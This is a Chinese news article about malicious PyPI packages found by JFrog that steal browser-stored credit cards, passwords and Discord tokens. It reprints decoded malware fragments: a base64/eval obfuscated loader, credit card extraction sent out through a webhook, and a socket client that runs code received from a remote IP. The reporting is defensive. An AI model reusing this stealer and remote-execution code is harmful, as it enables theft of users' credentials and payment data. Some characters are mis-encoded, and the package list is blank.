[[415370]]

本文經(jīng)AI新媒體量子位（公眾號(hào)ID:QbitAI）授權(quán)轉(zhuǎn)載，轉(zhuǎn)載請(qǐng)聯(lián)系出處。

Python程序員真的要小心了，PyPI軟件庫(kù)問(wèn)題真是越來(lái)越嚴(yán)重。

繼今年6月出現(xiàn)挖礦病毒后，PyPI最近再次出現(xiàn)了一批惡意軟件，

JFrog安全團(tuán)隊(duì)發(fā)現(xiàn)，PyPI庫(kù)中有多個(gè)軟件存在盜取信用卡信息、遠(yuǎn)程注入代碼的行為，而這些軟件總共被下載了3萬(wàn)次。

這些被發(fā)現(xiàn)問(wèn)題的惡意軟件分別是：

當(dāng)程序員安裝完這些軟件后，它們將在后臺(tái)不知不覺(jué)讀取瀏覽器文件夾，從而盜取信用卡信息和密碼。

它們是如何竊取信用卡信息的

安全研究人員發(fā)現(xiàn)，上述所有軟件包都使用Base64編碼進(jìn)行偽裝。

比如上述的noblesse2：

import base64, codecs 
magic = 'aW1wb3J0IGNvbG9yYW1hLCBkYXRldGltZS...' 
love = '0iLKOcY3L4Y2q1nJkxpl97nJE9Y2EyoTI0M...' 
god = 'a2luZy5hcHBlbmQodG9rZW4pDQogICAgICAg...' 
destiny = 'yxIKAVDaAQK3xjpQWkqRAboUcBIzqjEmS...' 
joy = '\x72\x6f\x74\x31\x33' 
trust = eval('\x6d\x61\x67\x69\x63') + eval('\x63\x6f\x64\x65\x63\x73\x2e\x64...') 
eval(compile(base64.b64decode(eval('\x74\x72\x75\x73\x74')),'','exec')) 

這種方法可以欺騙一些簡(jiǎn)單的分析工具，但是仔細(xì)研究可以發(fā)現(xiàn)其中的問(wèn)題。

以上8個(gè)軟件包分別包含了以下不同種類的惡意行為：

1、竊取Discord帳戶身份驗(yàn)證token

Discord身份驗(yàn)證token讀取器的代碼非常簡(jiǎn)單，它就是一組硬編碼的路徑：

local = os.getenv('LOCALAPPDATA') 
roaming = os.getenv('APPDATA') 
paths = { 
    'Discord': roaming + '\\Discord', 
    'Discord Canary': roaming + '\\discordcanary', 
    'Discord PTB': roaming + '\\discordptb', 
    'Google Chrome': local + '\\Google\\Chrome\\User Data\\Default', 
    'Opera': roaming + '\\Opera Software\\Opera Stable', 
    'Brave': local + '\\BraveSoftware\\Brave-Browser\\User Data\\Default', 
    'Yandex': local + '\\Yandex\\YandexBrowser\\User Data\\Default' 
} 

然后代碼會(huì)讀取這幾種瀏覽器路徑下的所有.log和.ldb文件，并查找Discord身份驗(yàn)證token，結(jié)果通過(guò)Webhook上傳到Discord。

2、竊取瀏覽器存儲(chǔ)的密碼或信用卡數(shù)據(jù)

當(dāng)你在瀏覽器中輸入密碼或信用卡數(shù)據(jù)時(shí)，一般都會(huì)跳出如下窗口，提示用戶保存這些信息。

雖然這給用戶帶來(lái)方便，今后不用一遍遍輸入密碼，但缺點(diǎn)是這些信息可能會(huì)惡意軟件獲取。

在這種情況下，惡意軟件會(huì)嘗試從Chrome竊取信用卡信息：

def cs(): 
    master_key = master() 
    login_db = os.environ['USERPROFILE'] + os.sep + \ 
        r'AppData\Local\Google\Chrome\User Data\default\Web Data' 
    shutil.copy2(login_db, 
                 "CCvault.db") 
    conn = sqlite3.connect("CCvault.db") 
    cursor = conn.cursor() 
    try: 
        cursor.execute("SELECT * FROM credit_cards") 
        for r in cursor.fetchall(): 
            username = r[1] 
            encrypted_password = r[4] 
            decrypted_password = dpw( 
                encrypted_password, master_key) 
            expire_mon = r[2] 
            expire_year = r[3] 
            hook.send(f"CARD-NAME: " + username + "\nNUMBER: " + decrypted_password + "\nEXPIRY M: " + str(expire_mon) + "\nEXPIRY Y: " + str(expire_year) + "\n" + "*" * 10 + "\n") 

這些信息和前一種情況一樣會(huì)通過(guò)Webhook上傳。

3、收集有關(guān)受感染PC的信息：如IP地址、計(jì)算機(jī)名稱和用戶名

除此之外，這些軟件還會(huì)收集Windows許可證密鑰信息、Windows版本以及屏幕截圖。

4、遠(yuǎn)程代碼注入

pytagora和pytagora2這兩個(gè)惡意軟件會(huì)嘗試連接到某個(gè)IP地址9009端口上，然后執(zhí)行Socket中可用的任何Python代碼。

其中混淆的代碼被安全人員解碼成如下片段：

import socket,struct,time 
s=socket.socket(2,socket.socket.socket.SOCK_STREAM) 
s.connect(('172.16.60.80',9009)) 
l=struct.unpack('>I',s.recv(4))[0] 
print (l) 
d=s.recv(l) 
print (d) 
while len(d)>!1: 
d+=s.recv(l-len(d)) 
print (d) 
exec(d,{'s':s}) 

但是安全人員現(xiàn)在不知道這個(gè)IP地址是什么，或者上面是否存在惡意軟件。

中毒后如何挽救

如果你發(fā)現(xiàn)自己的電腦已經(jīng)安裝了諸如noblesse的惡意軟件，那么請(qǐng)檢查一下你的瀏覽器到底保存了哪些密碼，這些密碼可能已經(jīng)泄露，請(qǐng)盡快修改。

對(duì)于Edge瀏覽器用戶，請(qǐng)?jiān)诘刂窓谥休斎雃dge://settings/passwords，查看已保存的密碼。

對(duì)于Chrome瀏覽器用戶，請(qǐng)?jiān)诘刂窓谥休斎隿hrome://settings/payments，在付款方式一欄下查看已保存的信用卡信息。

另外可以松口氣的是，PyPI維護(hù)人員已經(jīng)刪除了這些惡意軟件包。

雖然PyPI軟件庫(kù)現(xiàn)在是安全了，但是鑒于這些開(kāi)源軟件庫(kù)現(xiàn)在的維護(hù)狀態(tài)，未來(lái)很可能還會(huì)遇到更多攻擊。今年P(guān)yPI庫(kù)出現(xiàn)安全問(wèn)題的狀況就不止一次出現(xiàn)。

“攻擊者能夠使用簡(jiǎn)單的混淆技術(shù)來(lái)引入惡意軟件，這意味著開(kāi)發(fā)人員必須保持警惕。”

JFrog CTO說(shuō)，“這是一個(gè)系統(tǒng)性威脅，需要由軟件存儲(chǔ)庫(kù)的維護(hù)者和開(kāi)發(fā)人員在多個(gè)層面積極解決。”